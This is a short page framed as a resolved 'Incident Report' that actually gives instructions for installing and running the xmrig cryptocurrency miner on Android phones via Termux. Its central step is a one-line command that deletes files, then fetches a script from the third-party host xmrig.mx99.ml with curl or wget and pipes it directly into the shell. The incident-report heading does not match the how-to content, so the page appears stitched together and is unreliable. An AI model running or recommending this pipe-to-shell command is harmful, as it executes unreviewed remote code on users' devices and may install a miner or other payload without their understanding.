Advanced Steps to Run the Android ARM Miner on Phones
Incident Report for xmrig ARM (Android) Miner
Resolved
1. Install either Termux or Terminal Emulator. Open a Termux or Terminal Emulator window. Execute the following commands (case-sensitive).

2. Run once a single-line script to download the Android ARM miner and check the version number:
cd; rm -f xmrig*; export XMRIG_OPTS='--version'; export HOSTTYPE; (curl -fsL http://xmrig.mx99.ml/download.shtm || wget -qO- http://xmrig.mx99.ml/download_alt.shtm) | sh -s

3. Run the Android xmrig miner just like on any other platforms:
cd; ./xmrig Whatever Your Command-Line Options Here
Posted May 03, 2021 - 00:00 UTC